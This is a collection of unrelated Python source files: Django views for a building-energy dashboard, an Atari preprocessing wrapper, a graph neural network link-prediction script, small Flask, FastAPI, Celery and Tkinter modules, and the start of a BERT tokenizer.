Plugload.objects.filter(zone_id=zone_id, plugload_id__approval_status='APR',
network_status='ONLINE')]
zone_nickname = plugloads[0]['zone']['zone_nickname']
context.update(device_list_side_nav)
return render_to_response(
'dashboard/plugloads.html',
{'plugloads': plugloads, 'zone_id': zone_id, 'zone_nickname': zone_nickname}, context)
@login_required(login_url='/login/')
def zone_device_all_listing(request, zone_dev):
context = RequestContext(request)
username = request.user
zone_id = zone_dev.encode('ascii', 'ignore')
#Side navigation bar
active_al = get_notifications()
context.update({'active_al':active_al})
bemoss_not = general_notifications()
context.update({'b_al': bemoss_not})
device_list_side_nav = get_device_list_side_navigation()
context.update(device_list_side_nav)
#For the page
thermostats = [ob.data_as_json() for ob in
Thermostat.objects.filter(zone_id=zone_id, thermostat_id__approval_status='APR')]
if len(thermostats) != 0:
zone_nickname = thermostats[0]['zone']['zone_nickname']
rtu = [ob.as_json() for ob in RTU.objects.filter(zone_id=zone_id, rtu_id__approval_status='APR')]
if len(rtu) != 0:
zone_nickname = rtu[0]['zone']['zone_nickname']
vav = [ob.as_json() for ob in VAV.objects.filter(zone_id=zone_id, vav_id__approval_status='APR',
network_status='ONLINE')]
if len(vav) != 0:
zone_nickname = vav[0]['zone']['zone_nickname']
lighting = [ob.data_as_json() for ob in Lighting.objects.filter(zone_id=zone_id, lighting_id__approval_status='APR',
network_status='ONLINE')]
if len(lighting) != 0:
zone_nickname = lighting[0]['zone']['zone_nickname']
plugloads = [ob.data_as_json() for ob in
Plugload.objects.filter( network_status='ONLINE',zone_id=zone_id, plugload_id__approval_status='APR')]
if len(plugloads) != 0:
zone_nickname = plugloads[0]['zone']['zone_nickname']
return render_to_response(
'dashboard/zone_devices_all.html',
{'thermostats': thermostats, 'vav': vav, 'rtu': rtu, 'lighting_loads': lighting,
'plugloads': plugloads, 'zone_id': zone_id, 'zone_nickname': zone_nickname,
}, context)
#@login_required(login_url='/login/')
def change_approval_status(device_id, app_status_updated):
d_info = DeviceMetadata.objects.get(device_id=device_id)
current_approval_status = d_info.approval_status
print current_approval_status
updated_approval_status = app_status_updated
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
if updated_approval_status != current_approval_status:
d_info.approval_status = updated_approval_status
d_info.save()
return True
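# Example (hypothetical device id): change_approval_status('RTU1HOU1_199', 'Approved')
# looks up the metadata row, maps the label 'Approved' back to the code 'APR',
# and saves the new status only if it actually changed.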
@login_required(login_url='/login/')
def modify_thermostats(request):
print "Inside modify hvac controllers"
if request.POST:
_data = request.body
_data = json.loads(_data)
for thermostat in _data['thermostats']:
zone = Building_Zone.objects.get(zone_nickname__iexact=thermostat[2])
th_instance = Thermostat.objects.get(thermostat_id=thermostat[0])
updated_approval_status = thermostat[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
#if zone.zone_id != th_instance.zone_id:
zone_update_send_topic = '/ui/networkagent/' + str(thermostat[0]) + '/' + str(th_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
th_instance.zone = zone # change field
th_instance.nickname = thermostat[1]
th_instance.save()
change_approval_status(thermostat[0], thermostat[3])
for vav in _data['vav']:
zone = Building_Zone.objects.get(zone_nickname__iexact=vav[2])
vav_instance = VAV.objects.get(vav_id=vav[0])
updated_approval_status = vav[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(vav[0]) + '/' + str(vav_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
vav_instance.zone = zone # change field
vav_instance.nickname = vav[1]
vav_instance.save()
change_approval_status(vav[0], vav[3])
for rtu in _data['rtu']:
zone = Building_Zone.objects.get(zone_nickname__iexact=rtu[2])
rtu_instance = RTU.objects.get(rtu_id=rtu[0])
updated_approval_status = rtu[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(rtu[0]) + '/' + str(rtu_instance.zone_id) + '/' + str(zone.zone_id) + '/change/' + updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
rtu_instance.zone = zone # change field
rtu_instance.nickname = rtu[1]
rtu_instance.save()
change_approval_status(rtu[0], rtu[3])
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def modify_plugloads(request):
#print "Inside modify plugloads"
if request.POST:
_data = request.body
_data = json.loads(_data)
for plugload in _data:
zone = Building_Zone.objects.get(zone_nickname__iexact=plugload[2])
pl_instance = Plugload.objects.get(plugload_id=plugload[0])
updated_approval_status = plugload[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(plugload[0]) + '/' + str(pl_instance.zone_id) + '/' + str(zone.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
pl_instance.zone = zone # change field
pl_instance.nickname = plugload[1]
pl_instance.save()
change_approval_status(plugload[0], plugload[3])
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def modify_lighting_loads(request):
#print "Inside modify lighting loads"
if request.POST:
_data = request.body
_data = json.loads(_data)
for lt_load in _data:
zone = Building_Zone.objects.get(zone_nickname__iexact=lt_load[2])
lt_instance = Lighting.objects.get(lighting_id=lt_load[0])
updated_approval_status = lt_load[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(lt_load[0]) + '/' + str(lt_instance.zone_id) + '/' + str(zone.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
lt_instance.zone = zone # change field
lt_instance.nickname = lt_load[1]
lt_instance.save()
change_approval_status(lt_load[0], lt_load[3])
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def modify_nbd_thermostats(request):
print "Inside modify nbd hvac controllers"
if request.POST:
_data = request.body
_data = json.loads(_data)
# 0 -> device_id
# 1 -> nickname
# 2 -> approval status
for thermostat in _data['thermostats']:
th_instance = Thermostat.objects.get(thermostat_id=thermostat[0])
updated_approval_status = thermostat[2]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(thermostat[0]) + '/' + str(th_instance.zone_id) + '/' + str(th_instance.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
th_instance.nickname = thermostat[1]
th_instance.save()
change_approval_status(thermostat[0], thermostat[2])
for vav in _data['vav']:
vav_instance = VAV.objects.get(vav_id=vav[0])
updated_approval_status = vav[2]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(vav[0]) + '/' + str(vav_instance.zone_id) + '/' + str(vav_instance.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
vav_instance.nickname = vav[1]
vav_instance.save()
change_approval_status(vav[0], vav[2])
for rtu in _data['rtu']:
rtu_instance = RTU.objects.get(rtu_id=rtu[0])
updated_approval_status = rtu[2]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(rtu[0]) + '/' + str(rtu_instance.zone_id) + '/' + str(rtu_instance.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
rtu_instance.nickname = rtu[1]
rtu_instance.save()
change_approval_status(rtu[0], rtu[2])
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def modify_nbd_plugloads(request):
#print "Inside modify nbd plugloads"
if request.POST:
_data = request.body
_data = json.loads(_data)
for plugload in _data:
pl_instance = Plugload.objects.get(plugload_id=plugload[0])
updated_approval_status = plugload[2]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(plugload[0]) + '/' + str(pl_instance.zone_id) + '/' + str(pl_instance.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
pl_instance.nickname = plugload[1]
pl_instance.save()
change_approval_status(plugload[0], plugload[2])
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def modify_nbd_lighting_loads(request):
#print "Inside modify lighting loads"
if request.POST:
_data = request.body
_data = json.loads(_data)
for lt_load in _data:
lt_instance = Lighting.objects.get(lighting_id=lt_load[0])
updated_approval_status = lt_load[2]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(lt_load[0]) + '/' + str(lt_instance.zone_id) + '/' + str(lt_instance.zone_id) + '/change/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
lt_instance.nickname = lt_load[1]
lt_instance.save()
change_approval_status(lt_load[0], lt_load[2])
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
|
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A class implementing minimal Atari 2600 preprocessing.
Adapted from Dopamine.
https://github.com/google/dopamine/blob/master/dopamine/discrete_domains/atari_lib.py
This includes:
. Emitting a terminal signal when losing a life (optional).
. Frame skipping and color pooling.
. Resizing the image before it is provided to the agent.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gin
from gym import core as gym_core
from gym.spaces import box
import numpy as np
import cv2
@gin.configurable
class AtariPreprocessing(gym_core.Wrapper):
"""A class implementing image preprocessing for Atari 2600 agents.
Specifically, this provides the following subset from the JAIR paper
(Bellemare et al., 2013) and Nature DQN paper (Mnih et al., 2015):
* Frame skipping (defaults to 4).
* Terminal signal when a life is lost (off by default).
* Grayscale and max-pooling of the last two frames.
* Downsample the screen to a square image (defaults to 84x84).
More generally, this class follows the preprocessing guidelines set down in
Machado et al. (2018), "Revisiting the Arcade Learning Environment:
Evaluation Protocols and Open Problems for General Agents".
"""
def __init__(self,
env,
frame_skip=4,
terminal_on_life_loss=False,
screen_size=84):
"""Constructor for an Atari 2600 preprocessor.
Args:
env: Gym environment whose observations are preprocessed.
frame_skip: int, the frequency at which the agent experiences the game.
terminal_on_life_loss: bool, If True, the step() method returns
is_terminal=True whenever a life is lost. See Mnih et al. 2015.
screen_size: int, size of a resized Atari 2600 frame.
Raises:
ValueError: if frame_skip or screen_size are not strictly positive.
"""
super(AtariPreprocessing, self).__init__(env)
# Return the observation space adjusted to match the shape of the processed
# observations.
self.observation_space = box.Box(
low=0,
high=255,
shape=(screen_size, screen_size, 1),
dtype=np.uint8)
if frame_skip <= 0:
raise ValueError(
'Frame skip should be strictly positive, got {}'.format(frame_skip))
if screen_size <= 0:
raise ValueError('Target screen size should be strictly positive, got {}'
.format(screen_size))
self.terminal_on_life_loss = terminal_on_life_loss
self.frame_skip = frame_skip
self.screen_size = screen_size
obs_dims = self.env.observation_space
# Stores temporary observations used for pooling over two successive
# frames.
self.screen_buffer = [
np.empty((obs_dims.shape[0], obs_dims.shape[1]), dtype=np.uint8),
np.empty((obs_dims.shape[0], obs_dims.shape[1]), dtype=np.uint8)
]
self.game_over = False
self.lives = 0 # Will need to be set by reset().
def reset(self):
"""Resets the environment.
Returns:
observation: numpy array, the initial observation emitted by the
environment.
"""
self.env.reset()
self.lives = self.env.ale.lives()
self.game_over = False
self._fetch_grayscale_observation(self.screen_buffer[0])
self.screen_buffer[1].fill(0)
return self._pool_and_resize()
def step(self, action):
"""Applies the given action in the environment.
Remarks:
* If a terminal state (from life loss or episode end) is reached, this may
execute fewer than self.frame_skip steps in the environment.
* Furthermore, in this case the returned observation may not contain valid
image data and should be ignored.
Args:
action: The action to be executed.
Returns:
observation: numpy array, the observation following the action.
reward: float, the reward following the action.
is_terminal: bool, whether the environment has reached a terminal state.
This is true when a life is lost and terminal_on_life_loss, or when the
episode is over.
info: Gym API's info data structure.
"""
accumulated_reward = 0.
for time_step in range(self.frame_skip):
# We bypass the Gym observation altogether and directly fetch the
# grayscale image from the ALE. This is a little faster.
_, reward, game_over, info = self.env.step(action)
accumulated_reward += reward
if self.terminal_on_life_loss:
new_lives = self.env.ale.lives()
is_terminal = game_over or new_lives < self.lives
self.lives = new_lives
else:
is_terminal = game_over
if is_terminal:
break
# We max-pool over the last two frames, in grayscale.
elif time_step >= self.frame_skip - 2:
# When frame_skip==1, taking a max ensures that it's still
# screen_buffer[0] that holds the fetched observation
t = time_step - max(self.frame_skip - 2, 0)
self._fetch_grayscale_observation(self.screen_buffer[t])
# Pool the last two observations.
observation = self._pool_and_resize()
self.game_over = game_over
return observation, accumulated_reward, is_terminal, info
def _fetch_grayscale_observation(self, output):
"""Returns the current observation in grayscale.
The returned observation is stored in 'output'.
Args:
output: numpy array, screen buffer to hold the returned observation.
Returns:
observation: numpy array, the current observation in grayscale.
"""
self.env.ale.getScreenGrayscale(output)
return output
def _pool_and_resize(self):
"""Transforms two frames into a Nature DQN observation.
For efficiency, the transformation is done in-place in self.screen_buffer.
Returns:
transformed_screen: numpy array, pooled, resized screen.
"""
# Pool if there are enough screens to do so.
if self.frame_skip > 1:
np.maximum(
self.screen_buffer[0],
self.screen_buffer[1],
out=self.screen_buffer[0])
transformed_image = cv2.resize(
self.screen_buffer[0], (self.screen_size, self.screen_size),
interpolation=cv2.INTER_AREA)
int_image = np.asarray(transformed_image, dtype=np.uint8)
return np.expand_dims(int_image, axis=2)
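# A minimal usage sketch (assumes gym with the Atari ROMs installed; the
# environment id below is an example, not part of this module):
#
#   import gym
#   env = AtariPreprocessing(gym.make('PongNoFrameskip-v4'), frame_skip=4)
#   obs = env.reset()                                  # (84, 84, 1) uint8 grayscale
#   obs, reward, done, info = env.step(env.action_space.sample())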
|
"""
Generate docs based on rst.
"""
from navio_tasks.cli_commands import (
check_command_exists,
config_pythonpath,
execute_with_environment,
)
from navio_tasks.settings import VENV_SHELL
from navio_tasks.utils import inform
def do_docs() -> str:
"""
Generate docs based on rst.
"""
check_command_exists("make")
my_env = config_pythonpath()
command = f"{VENV_SHELL} make html".strip().replace("  ", " ")  # collapse the double space left when VENV_SHELL is empty
inform(command)
execute_with_environment(command, env=my_env)
return "Docs generated"
|
import argparse
import torch
import numpy as np
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torch_sparse import SparseTensor
from torch_geometric.data import GraphSAINTRandomWalkSampler
from torch_geometric.nn import GCNConv
from torch_geometric.utils import to_undirected, degree
from ogb.linkproppred import PygLinkPropPredDataset, Evaluator
from logger import Logger
class GCN(torch.nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels, num_layers,
dropout):
super(GCN, self).__init__()
self.convs = torch.nn.ModuleList()
self.convs.append(
GCNConv(in_channels, hidden_channels, normalize=False))
for _ in range(num_layers - 2):
self.convs.append(
GCNConv(hidden_channels, hidden_channels, normalize=False))
self.convs.append(
GCNConv(hidden_channels, out_channels, normalize=False))
self.dropout = dropout
def reset_parameters(self):
for conv in self.convs:
conv.reset_parameters()
def forward(self, x, edge_index, edge_weight=None):
for conv in self.convs[:-1]:
x = conv(x, edge_index, edge_weight)
x = F.relu(x)
x = F.dropout(x, p=self.dropout, training=self.training)
x = self.convs[-1](x, edge_index, edge_weight)
return x
class GCNInference(torch.nn.Module):
def __init__(self, weights):
super(GCNInference, self).__init__()
self.weights = weights
def forward(self, x, adj):
for i, (weight, bias) in enumerate(self.weights):
x = adj @ x @ weight + bias
x = np.clip(x, 0, None) if i < len(self.weights) - 1 else x
return x
class LinkPredictor(torch.nn.Module):
def __init__(self, in_channels, hidden_channels, out_channels, num_layers,
dropout):
super(LinkPredictor, self).__init__()
self.lins = torch.nn.ModuleList()
self.lins.append(torch.nn.Linear(in_channels, hidden_channels))
for _ in range(num_layers - 2):
self.lins.append(torch.nn.Linear(hidden_channels, hidden_channels))
self.lins.append(torch.nn.Linear(hidden_channels, out_channels))
self.dropout = dropout
def reset_parameters(self):
for lin in self.lins:
lin.reset_parameters()
def forward(self, x_i, x_j):
x = x_i * x_j
for lin in self.lins[:-1]:
x = lin(x)
x = F.relu(x)
x = F.dropout(x, p=self.dropout, training=self.training)
x = self.lins[-1](x)
return torch.sigmoid(x)
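# LinkPredictor scores a candidate edge (i, j) by taking the element-wise
# product of the two node embeddings and passing it through a small MLP with a
# final sigmoid, so the output can be read as an edge probability.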
def train(model, predictor, loader, optimizer, device):
model.train()
total_loss = total_examples = 0
for data in loader:
data = data.to(device)
optimizer.zero_grad()
h = model(data.x, data.edge_index, data.edge_norm * data.edge_attr)
src, dst = data.edge_index
pos_out = predictor(h[src], h[dst])
pos_loss = -torch.log(pos_out + 1e-15).mean()
# Just do some trivial random sampling.
dst_neg = torch.randint(0, data.x.size(0), src.size(),
dtype=torch.long, device=device)
neg_out = predictor(h[src], h[dst_neg])
neg_loss = -torch.log(1 - neg_out + 1e-15).mean()
loss = pos_loss + neg_loss
loss.backward()
optimizer.step()
num_examples = src.size(0)
total_loss += loss.item() * num_examples
total_examples += num_examples
return total_loss / total_examples
@torch.no_grad()
def test(model, predictor, data, split_edge, evaluator, batch_size, device):
predictor.eval()
print('Evaluating full-batch GNN on CPU...')
weights = [(conv.weight.cpu().detach().numpy(),
conv.bias.cpu().detach().numpy()) for conv in model.convs]
model = GCNInference(weights)
x = data.x.numpy()
adj = SparseTensor(row=data.edge_index[0], col=data.edge_index[1],
value=data.edge_attr)
adj = adj.to_scipy(layout='csr')
h = torch.from_numpy(model(x, adj)).to(device)
def test_split(split):
source = split_edge[split]['source_node'].to(device)
target = split_edge[split]['target_node'].to(device)
target_neg = split_edge[split]['target_node_neg'].to(device)
pos_preds = []
for perm in DataLoader(range(source.size(0)), batch_size):
src, dst = source[perm], target[perm]
pos_preds += [predictor(h[src], h[dst]).squeeze().cpu()]
pos_pred = torch.cat(pos_preds, dim=0)
neg_preds = []
source = source.view(-1, 1).repeat(1, 1000).view(-1)
target_neg = target_neg.view(-1)
for perm in DataLoader(range(source.size(0)), batch_size):
src, dst_neg = source[perm], target_neg[perm]
neg_preds += [predictor(h[src], h[dst_neg]).squeeze().cpu()]
neg_pred = torch.cat(neg_preds, dim=0).view(-1, 1000)
return evaluator.eval({
'y_pred_pos': pos_pred,
'y_pred_neg': neg_pred,
})['mrr_list'].mean().item()
train_mrr = test_split('eval_train')
valid_mrr = test_split('valid')
test_mrr = test_split('test')
return train_mrr, valid_mrr, test_mrr
def main():
parser = argparse.ArgumentParser(description='OGBL-Citation (GraphSAINT)')
parser.add_argument('--device', type=int, default=0)
parser.add_argument('--log_steps', type=int, default=1)
parser.add_argument('--num_workers', type=int, default=0)
parser.add_argument('--num_layers', type=int, default=3)
parser.add_argument('--hidden_channels', type=int, default=256)
parser.add_argument('--dropout', type=float, default=0.0)
parser.add_argument('--batch_size', type=int, default=16 * 1024)
parser.add_argument('--walk_length', type=int, default=3)
parser.add_argument('--sample_coverage', type=int, default=400)
parser.add_argument('--lr', type=float, default=0.001)
parser.add_argument('--epochs', type=int, default=200)
parser.add_argument('--num_steps', type=int, default=100)
parser.add_argument('--eval_steps', type=int, default=10)
parser.add_argument('--runs', type=int, default=10)
args = parser.parse_args()
print(args)
device = f'cuda:{args.device}' if torch.cuda.is_available() else 'cpu'
device = torch.device(device)
dataset = PygLinkPropPredDataset(name='ogbl-citation')
split_edge = dataset.get_edge_split()
data = dataset[0]
data.edge_index = to_undirected(data.edge_index, data.num_nodes)
data.edge_index, data.edge_attr = GCNConv.norm(data.edge_index,
data.num_nodes)
print(data.edge_index)
print(data.edge_attr)
loader = GraphSAINTRandomWalkSampler(data, batch_size=args.batch_size,
walk_length=args.walk_length,
num_steps=args.num_steps,
sample_coverage=args.sample_coverage,
save_dir=dataset.processed_dir,
num_workers=args.num_workers)
print(loader.adj)
print(loader.edge_norm)
print(loader.edge_norm.min(), loader.edge_norm.max())
# We randomly pick some training samples that we want to evaluate on:
torch.manual_seed(12345)
idx = torch.randperm(split_edge['train']['source_node'].numel())[:86596]
split_edge['eval_train'] = {
'source_node': split_edge['train']['source_node'][idx],
'target_node': split_edge['train']['target_node'][idx],
'target_node_neg': split_edge['valid']['target_node_neg'],
}
model = GCN(data.x.size(-1), args.hidden_channels, args.hidden_channels,
args.num_layers, args.dropout).to(device)
predictor = LinkPredictor(args.hidden_channels, args.hidden_channels, 1,
args.num_layers, args.dropout).to(device)
evaluator = Evaluator(name='ogbl-citation')
logger = Logger(args.runs, args)
for run in range(args.runs):
model.reset_parameters()
predictor.reset_parameters()
optimizer = torch.optim.Adam(
list(model.parameters()) + list(predictor.parameters()),
lr=args.lr)
for epoch in range(1, 1 + args.epochs):
loss = train(model, predictor, loader, optimizer, device)
print(f'Run: {run + 1:02d}, Epoch: {epoch:02d}, Loss: {loss:.4f}')
if epoch % args.eval_steps == 0:
result = test(model, predictor, data, split_edge, evaluator,
batch_size=64 * 1024, device=device)
logger.add_result(run, result)
if epoch % args.log_steps == 0:
train_mrr, valid_mrr, test_mrr = result
print(f'Run: {run + 1:02d}, '
f'Epoch: {epoch:02d}, '
f'Loss: {loss:.4f}, '
f'Train: {train_mrr:.4f}, '
f'Valid: {valid_mrr:.4f}, '
f'Test: {test_mrr:.4f}')
logger.print_statistics(run)
logger.print_statistics()
if __name__ == "__main__":
main()
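# Example invocation (the file name is a placeholder for however this script is saved):
#   python graph_saint_citation.py --device 0 --epochs 200 --runs 10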
|
from celery import shared_task
from .consumer import receive
@shared_task
def send_summary():
receive()
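# send_summary is a plain Celery shared task wrapping the consumer's receive();
# it can be invoked asynchronously with send_summary.delay() or wired to a
# periodic schedule (for example via Celery beat) in the project configuration.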
|
# coding=utf-8
# encoding=utf-8
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from passlib.hash import bcrypt_sha256
from app.utils import get_time_stamp
app = Flask(__name__)
app.config.from_object('app.config.Config')
db = SQLAlchemy() # type: SQLAlchemy
class Data(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(32))
value = db.Column(db.String(32))
time = db.Column(db.String(32))
def __init__(self, name, value, time):
self.name = name
self.value = value
self.time = time
def __repr__(self):
return "<Data {0}={1}>".format(self.name, self.value)
class Users(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128), unique=True)
email = db.Column(db.String(128), unique=True)
password = db.Column(db.String(128))
website = db.Column(db.String(128))
nickname = db.Column(db.String(128))
number = db.Column(db.String(32))
team = db.Column(db.Integer)  # foreign key to the team table
extra_info = db.Column(db.String(32))
banned = db.Column(db.Boolean, default=False)
verified = db.Column(db.Boolean, default=False)
admin = db.Column(db.Boolean, default=False)
# Pass the callable (not its result) so the timestamp is computed per row
# at insert time rather than once at import time.
join_time = db.Column(db.String(32), default=get_time_stamp)
def __init__(self, name, email, password):
self.name = name
self.email = email
self.password = bcrypt_sha256.encrypt(str(password))
def __repr__(self):
return '<user %r>' % self.name
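# A minimal usage sketch (assumes db has been bound to the Flask app and the
# tables created; the values are placeholders):
#   user = Users(name="alice", email="alice@example.com", password="s3cret")
#   db.session.add(user)
#   db.session.commit()   # the password is stored as a bcrypt_sha256 hash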
|
'''
Created on 5.10.2010.
@author: Tin Franovic
'''
from Tkinter import *
from PIL import Image, ImageTk
def do_animation(currentframe):
def do_image():
wrap.create_image(50,50,image=frame[currentframe])
try:
do_image()
except IndexError:
currentframe = 0
do_image()
wrap.update_idletasks()
currentframe = currentframe + 1
root.after(1000, do_animation, currentframe)
def draw(stateSequence):
global wrap,frame,root
root = Tk()
root.title("WalkingRobot")
frame=[]
for i in stateSequence:
fname="step"+str(i+1)+".png"
img=ImageTk.PhotoImage(Image.open(fname))
frame+=[img]
wrap = Canvas(root, width=200, height=120)
wrap.pack()
root.after(10, do_animation, 0)
root.mainloop()
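# Example call (assumes step1.png, step2.png, ... exist next to the script):
#   draw([0, 1, 2, 1])   # cycles through the loaded frames at roughly one frame per second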
|
from os.path import join
from fastapi import FastAPI, Request
from fastapi.responses import RedirectResponse
from .api.v1.main import api as api_v1
app = FastAPI(docs_url=None, redoc_url=None)
app.mount("/api/v1", api_v1)
@app.get("/", include_in_schema=False)
def index(request: Request):
return RedirectResponse(join(request.url.path, "api", "v1", "docs"))
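# The v1 API is mounted as a sub-application, so its interactive docs (assuming
# api_v1 keeps FastAPI's default docs_url) are served at /api/v1/docs; the root
# path simply redirects there, while docs are disabled on the outer app via
# docs_url=None / redoc_url=None.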
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes.
Classes and functions for text tokenization.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import re
import unicodedata
import six
import tensorflow as tf
def validate_case_matches_checkpoint(do_lower_case, init_checkpoint):
"""Checks whether the casing config is consistent with the checkpoint name."""
# The casing has to be passed in by the user and there is no explicit check
# as to whether it matches the checkpoint. The casing information probably
# should have been stored in the bert_config.json file, but it's not, so
# we have to heuristically detect it to validate.
if not init_checkpoint:
return
m = re.match("^.*?([A-Za-z0-9_-]+)/bert_model.ckpt", init_checkpoint)
if m is None:
return
model_name = m.group(1)
lower_models = [
"uncased_L-24_H-1024_A-16", "uncased_L-12_H-768_A-12",
"multilingual_L-12_H-768_A-12", "chinese_L-12_H-768_A-12"
]
cased_models = [
"cased_L-12_H-768_A-12", "cased_L-24_H-1024_A-16",
"multi_cased_L-12_H-768_A-12"
]
is_bad_config = False
if model_name in lower_models and not do_lower_case:
is_bad_config = True
actual_flag = "False"
case_name = "lowercased"
opposite_flag = "True"
if model_name in cased_models and do_lower_case:
is_bad_config = True
actual_flag = "True"
case_name = "cased"
opposite_flag = "False"
if is_bad_config:
raise ValueError(
"You passed in `--do_lower_case=%s` with `--init_checkpoint=%s`. "
"However, `%s` seems to be a %s model, so you "
"should pass in `--do_lower_case=%s` so that the fine-tuning matches "
"how the model was pre-trained. If this error is wrong, please "
"just comment out this check." % (actual_flag, init_checkpoint,
model_name, case_name, opposite_flag))
def convert_to_unicode(text):
"""Converts `text` to Unicode (if it's not already), assuming utf-8 input."""
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text.decode("utf-8", "ignore")
elif isinstance(text, unicode):
return text
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def printable_text(text):
"""Returns text encoded in a way suitable for print or `tf.logging`."""
# These functions want `str` for both Python2 and Python3, but in one case
# it's a Unicode string and in the other it's a byte string.
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text
elif isinstance(text, unicode):
return text.encode("utf-8")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def load_vocab(vocab_file):
"""Loads a vocabulary file into a dictionary."""
vocab = collections.OrderedDict()
index = 0
with tf.gfile.GFile(vocab_file, "r") as reader:
while True:
token = convert_to_unicode(reader.readline())
if not token:
break
token = token.strip()
vocab[token] = index
index += 1
return vocab
def convert_by_vocab(vocab, items):
"""Converts a sequence of [tokens|ids] using the vocab."""
output = []
for item in items:
output.append(vocab[item])
return output
def convert_tokens_to_ids(vocab, tokens):
return convert_by_vocab(vocab, tokens)
def convert_ids_to_tokens(inv_vocab, ids):
return convert_by_vocab(inv_vocab, ids)
def whitespace_tokenize(text):
"""Runs basic whitespace cleaning and splitting on a piece of text."""
# Tokenize simply by splitting on whitespace.
text = text.strip()
if not text:
return []
tokens = text.split()
return tokens
class FullTokenizer(object):
"""Runs end-to-end tokenization."""
# do_lower_case controls whether the input is lowercased. When fine-tuning it
# must match the pretrained model: e.g. uncased_L-12_H-768_A-12 is
# case-insensitive, so do_lower_case must be True for that checkpoint.
